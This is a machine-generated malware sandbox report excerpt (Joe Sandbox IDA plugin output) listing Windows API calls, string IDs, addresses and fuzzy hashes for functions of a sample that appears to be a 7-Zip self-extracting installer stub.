                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??3@
                                                                                                        • String ID: IA$IA$IA$IA$IA$IA
                                                                                                        • API String ID: 613200358-3743982587
                                                                                                        • Opcode ID: 40f272bda1e8b06883172bb117e612dab295516409bd6b20c4bfa41197a0bb68
                                                                                                        • Instruction ID: 4cebfcab61734def35128a955d6a3e34031d8899c11ca8f9bd2aeb72941b6852
                                                                                                        • Opcode Fuzzy Hash: 40f272bda1e8b06883172bb117e612dab295516409bd6b20c4bfa41197a0bb68
                                                                                                        • Instruction Fuzzy Hash: D2221671900248DFCB24EF65C8D09EEBBB5FF48304F50852EE91AA7291DB38A945CF58
                                                                                                        APIs
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,00417788,00000000,SetEnvironment), ref: 00408479
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??3@
                                                                                                        • String ID: BeginPrompt$ErrorTitle$FinishMessage$HelpText$SetEnvironment$WarningTitle
                                                                                                        • API String ID: 613200358-994561823
                                                                                                        • Opcode ID: ba6429a52b0e3d4e37370c566184cf06056e8edfb56e018e3387c8b386e99002
                                                                                                        • Instruction ID: 5566f9f9667118f06bc812855c9affabb63102f3a10b3971892d5eca1131561f
                                                                                                        • Opcode Fuzzy Hash: ba6429a52b0e3d4e37370c566184cf06056e8edfb56e018e3387c8b386e99002
                                                                                                        • Instruction Fuzzy Hash: CA51D47080420AAACF24AB559E85AFB7774EB20348F54443FF881722E1EF7D5D82D64E
                                                                                                        APIs
                                                                                                        • memcpy.MSVCRT(?,00417410,00000160), ref: 00406DD1
                                                                                                        • SystemParametersInfoW.USER32(00000029,00000000,?,00000000), ref: 00406DF0
                                                                                                        • GetDC.USER32(00000000), ref: 00406DFB
                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00406E07
                                                                                                        • MulDiv.KERNEL32(?,00000048,00000000), ref: 00406E16
                                                                                                        • ReleaseDC.USER32(00000000,?), ref: 00406E24
                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00406E4C
                                                                                                        • DialogBoxIndirectParamW.USER32(00000000,?,?,Function_0000667A), ref: 00406E81
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CapsDeviceDialogHandleIndirectInfoModuleParamParametersReleaseSystemmemcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 2693764856-0
                                                                                                        • Opcode ID: e70a94c77e8458ae7b0f85d98e5dff18e09bef3a98047e8bed90a0db42bf0d7e
                                                                                                        • Instruction ID: b2c1943609947f3a034a1f42a4fd453b3666a2b5c4d4ccfd9a1c2059c5c1cb6f
                                                                                                        • Opcode Fuzzy Hash: e70a94c77e8458ae7b0f85d98e5dff18e09bef3a98047e8bed90a0db42bf0d7e
                                                                                                        • Instruction Fuzzy Hash: C32184B5500218BFDB215F61DC45EEB7B7CFB08746F0040B6F609A1190D7748E948B65
                                                                                                        APIs
                                                                                                        • GetDC.USER32(?), ref: 0040696E
                                                                                                        • GetSystemMetrics.USER32(0000000B), ref: 0040698A
                                                                                                        • GetSystemMetrics.USER32(0000003D), ref: 00406993
                                                                                                        • GetSystemMetrics.USER32(0000003E), ref: 0040699B
                                                                                                        • SelectObject.GDI32(?,?), ref: 004069B8
                                                                                                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 004069D3
                                                                                                        • SelectObject.GDI32(?,?), ref: 004069F9
                                                                                                        • ReleaseDC.USER32(?,?), ref: 00406A08
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MetricsSystem$ObjectSelect$DrawReleaseText
                                                                                                        • String ID:
                                                                                                        • API String ID: 2466489532-0
                                                                                                        • Opcode ID: 3371c90df87af61a96ab0a4f5adfc31794890a389d4733c3cd0e84d47817aa4d
                                                                                                        • Instruction ID: 7c755332e1b278278a0584394201b19561512224090c74d51841a9ad660c27ee
                                                                                                        • Opcode Fuzzy Hash: 3371c90df87af61a96ab0a4f5adfc31794890a389d4733c3cd0e84d47817aa4d
                                                                                                        • Instruction Fuzzy Hash: 6B216871900209EFCB119F65DD84A8EBFF4EF08321F10C46AE559A72A0C7359A50DF40
                                                                                                        APIs
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00407B6D
                                                                                                        • GetDlgItem.USER32(?,000004B8), ref: 00407B8B
                                                                                                        • SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00407B9D
                                                                                                        • wsprintfW.USER32 ref: 00407BBB
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?), ref: 00407C53
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??3@ItemMessageSendUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
                                                                                                        • String ID: %d%%
                                                                                                        • API String ID: 3753976982-1518462796
                                                                                                        • Opcode ID: aa4dec2a7ad722700f06cff0ab8aedf9afd1fc0073b92253c29a7aba1139f781
                                                                                                        • Instruction ID: b955b8041d8a67620c3180d4911c799512bd6939d195f5b55c3092177650065a
                                                                                                        • Opcode Fuzzy Hash: aa4dec2a7ad722700f06cff0ab8aedf9afd1fc0073b92253c29a7aba1139f781
                                                                                                        • Instruction Fuzzy Hash: 1D31D371904208BBDB11AFA0CC45EDA7BB9EF48708F10847AFA42B61E1D779B904CB59
                                                                                                        APIs
                                                                                                        • lstrlenW.KERNEL32(hAA,00000020,?,?,00405838,?,?,?,00000000,?), ref: 004040A4
                                                                                                          • Part of subcall function 00401A85: CharUpperW.USER32(?,7556E0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
                                                                                                          • Part of subcall function 00401A85: CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00404156
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 0040415E
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 0040416D
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00404175
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??3@$CharUpper$lstrlen
                                                                                                        • String ID: hAA
                                                                                                        • API String ID: 2587799592-1362906312
                                                                                                        • Opcode ID: adb6fa16ce232373d688ba306e393be0ac1d0d6b70f8692f98c2ac8800094ba3
                                                                                                        • Instruction ID: 7f7e13310b21401de90169bcc26cd057e2afddf23eedd5de54135d69024cf91c
                                                                                                        • Opcode Fuzzy Hash: adb6fa16ce232373d688ba306e393be0ac1d0d6b70f8692f98c2ac8800094ba3
                                                                                                        • Instruction Fuzzy Hash: D7212772D40215AACF20ABA4CC46AEB77B9DF90354F10407BEB41BB2E1E7789D848658
                                                                                                        APIs
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000001,00000000,00000000,00000001,?,00000000), ref: 00404D3E
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,004054CC,?,;!@InstallEnd@!,004054CC,;!@Install@!UTF-8!,00417400,00000000,00000001,?,00000000), ref: 00404DA0
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,004054CC,?,;!@InstallEnd@!,004054CC,;!@Install@!UTF-8!,00417400,00000000,00000001,?,00000000), ref: 00404DB8
                                                                                                          • Part of subcall function 00403354: lstrlenW.KERNEL32(00404AC6,?,?,00000000,?,?,?,?,00404AC6,?), ref: 00403361
                                                                                                          • Part of subcall function 00403354: GetSystemTimeAsFileTime.KERNEL32(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 004033D7
                                                                                                          • Part of subcall function 00403354: GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004033DE
                                                                                                          • Part of subcall function 00403354: ??3@YAXPAX@Z.MSVCRT(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 0040349D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??3@$FileTime$AttributesSystemlstrlen
                                                                                                        • String ID: 03A$;!@Install@!UTF-8!$;!@InstallEnd@!
                                                                                                        • API String ID: 4038993085-2279431206
                                                                                                        • Opcode ID: e2e9c0809e9bc3cca90199b30f9b7e4bb774994a3498fa8d8027c2002ddee9c1
                                                                                                        • Instruction ID: 637b7b13a9bcd1d52ea1019587bfa2fb4435f6835f564ae220b3123002230846
                                                                                                        • Opcode Fuzzy Hash: e2e9c0809e9bc3cca90199b30f9b7e4bb774994a3498fa8d8027c2002ddee9c1
                                                                                                        • Instruction Fuzzy Hash: CE312D71D0021EEACF05EF92CD429EEBBB4BF44318F10042BE911762E1DB785649DB98
                                                                                                        APIs
                                                                                                        • EndDialog.USER32(?,00000000), ref: 00407579
                                                                                                        • KillTimer.USER32(?,00000001), ref: 0040758A
                                                                                                        • SetTimer.USER32(?,00000001,00000000,00000000), ref: 004075B4
                                                                                                        • SuspendThread.KERNEL32(00000294), ref: 004075CD
                                                                                                        • ResumeThread.KERNEL32(00000294), ref: 004075EA
                                                                                                        • EndDialog.USER32(?,00000000), ref: 0040760C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DialogThreadTimer$KillResumeSuspend
                                                                                                        • String ID:
                                                                                                        • API String ID: 4151135813-0
                                                                                                        • Opcode ID: fa37b7d0569be928e5d0aecc9653dabfd5de706af621d680b5378aa8e85f3b57
                                                                                                        • Instruction ID: ebb94c5c4675b2e6542c2b2cb7d5652cccd5624f9a00d71f737e39ca63bd9789
                                                                                                        • Opcode Fuzzy Hash: fa37b7d0569be928e5d0aecc9653dabfd5de706af621d680b5378aa8e85f3b57
                                                                                                        • Instruction Fuzzy Hash: 9811BF70A08618BBD7212F15EE849E77BBDFB00756B00843AF523A05A0CB39BD00DA1D
                                                                                                        APIs
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,00000025,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404E85
                                                                                                          • Part of subcall function 00404343: ??3@YAXPAX@Z.MSVCRT(?,?,?,004177C4,004177C4,?,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 004043B6
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,00000025,004177C4,004177C4,00000000,00000025,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404EAB
                                                                                                        • wsprintfA.USER32 ref: 00404EBC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??3@$wsprintf
                                                                                                        • String ID: :Language:%u!$;!@Install@!UTF-8!$;!@InstallEnd@!
                                                                                                        • API String ID: 2704270482-1550708412
                                                                                                        • Opcode ID: 7515f3c378dc653de5be2f700fb88d196d5ad6fff9ca6d0fef850a5bff4b34ed
                                                                                                        • Instruction ID: afe26c372a183c0ca4a1b7edc16cb7be903c3e4040aad79e05e22cec791dc9d0
                                                                                                        • Opcode Fuzzy Hash: 7515f3c378dc653de5be2f700fb88d196d5ad6fff9ca6d0fef850a5bff4b34ed
                                                                                                        • Instruction Fuzzy Hash: D8115E71B00018BBCF00FB95CC42EFE77ADAB84705B10402EBA15E3182DB78AB028799
                                                                                                        APIs
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405,?,00000000,00000000,00000000), ref: 004038C6
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405,?,00000000,00000000), ref: 00403904
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405), ref: 0040392A
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00000000,00417788,00417788,00000000,00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788), ref: 00403932
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??3@
                                                                                                        • String ID: %%T/$%%T\
                                                                                                        • API String ID: 613200358-2679640699
                                                                                                        • Opcode ID: 9bca89f2fab22d944cbc1d50cb8e29a5624cbb02733552bbeda1c8d4c186658e
                                                                                                        • Instruction ID: 53c9ca64f2466311d4136dbbff57d229d1af9e29f5fa76e56e45344ae10c91f3
                                                                                                        • Opcode Fuzzy Hash: 9bca89f2fab22d944cbc1d50cb8e29a5624cbb02733552bbeda1c8d4c186658e
                                                                                                        • Instruction Fuzzy Hash: 5011DD3190410EBACF05FFA1D857CEDBB79AE00708F50806AB511760E1EF79A785DB98
                                                                                                        APIs
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405,?,00000000,00000000,00000000), ref: 00403981
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405,?,00000000,00000000), ref: 004039BF
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405), ref: 004039E5
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00000000,00414784,00414784,00000000,00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784), ref: 004039ED
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??3@
                                                                                                        • String ID: %%S/$%%S\
                                                                                                        • API String ID: 613200358-358529586
                                                                                                        • Opcode ID: e3b70a995be6e898b0b314c58b201ee2695760fe101ea1f38fcc60c70cbcb614
                                                                                                        • Instruction ID: c240205f9e12946546b7747d8fd44f392230bc1153c6614d6b8016afa5fd7689
                                                                                                        • Opcode Fuzzy Hash: e3b70a995be6e898b0b314c58b201ee2695760fe101ea1f38fcc60c70cbcb614
                                                                                                        • Instruction Fuzzy Hash: 1D11AD3190410EBACF05FFA1D856CEDBB79AE00708F51806AB511760E1EF78A789DB98
                                                                                                        APIs
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405,?,00000000,00000000,00000000), ref: 00403A3C
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405,?,00000000,00000000), ref: 00403A7A
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405), ref: 00403AA0
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00000000,00414784,00414784,00000000,00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784), ref: 00403AA8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??3@
                                                                                                        • String ID: %%M/$%%M\
                                                                                                        • API String ID: 613200358-4143866494
                                                                                                        • Opcode ID: a08b7da797f9f27da56c511d10cc8b4fe2326b5189664468d4e6b69bcfc696d5
                                                                                                        • Instruction ID: 5f6947e2f47a7d655e02fb84317d9747a35bc7200d49f7273ebe403b31479b31
                                                                                                        • Opcode Fuzzy Hash: a08b7da797f9f27da56c511d10cc8b4fe2326b5189664468d4e6b69bcfc696d5
                                                                                                        • Instruction Fuzzy Hash: C911AD3190410EBACF05FFA1D956CEDBB79AE00708F51806AB511760E1EF78A789DB58
                                                                                                        APIs
                                                                                                        • _CxxThrowException.MSVCRT(00000000,00414CFC), ref: 0040E4EE
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionThrow
                                                                                                        • String ID: $JA$4JA$DJA$TJA$hJA$xJA
                                                                                                        • API String ID: 432778473-803145960
                                                                                                        • Opcode ID: 8cab838d89dd1577677f775eaf8cb930bb6d64206a7fe5cceb0cff601651d84b
                                                                                                        • Instruction ID: 5492ea6659e041f1bcf420c4685f7038b08242b420f8f2c51a6428b2159ddc92
                                                                                                        • Opcode Fuzzy Hash: 8cab838d89dd1577677f775eaf8cb930bb6d64206a7fe5cceb0cff601651d84b
                                                                                                        • Instruction Fuzzy Hash: 7211A5F0541B419BC7308F16E544587FBF8AF907587218A1FD0AA9BA51D3F8A1888B9C
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040BA46: ??2@YAPAXI@Z.MSVCRT(0000000C,?,0040C20C,004149B0,00000001,?,?,00000000), ref: 0040BA4B
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00000000,004149B0,00000001,?,?,00000000), ref: 0040C20D
                                                                                                          • Part of subcall function 0040ADC3: ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
                                                                                                          • Part of subcall function 0040ADC3: memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
                                                                                                          • Part of subcall function 0040ADC3: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,004149B0,00000001,?,?,00000000), ref: 0040C245
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??2@$??3@$memmove
                                                                                                        • String ID: IA$IA$IA
                                                                                                        • API String ID: 4294387087-924693538
                                                                                                        • Opcode ID: 22ff6adae0059519abcdcb5d952883f4cd1f1e51cc0638883f64576781f465c4
                                                                                                        • Instruction ID: 38d37476858cbe2739f158cf8086d9562841ccd83740beefedbf55b6536d6dac
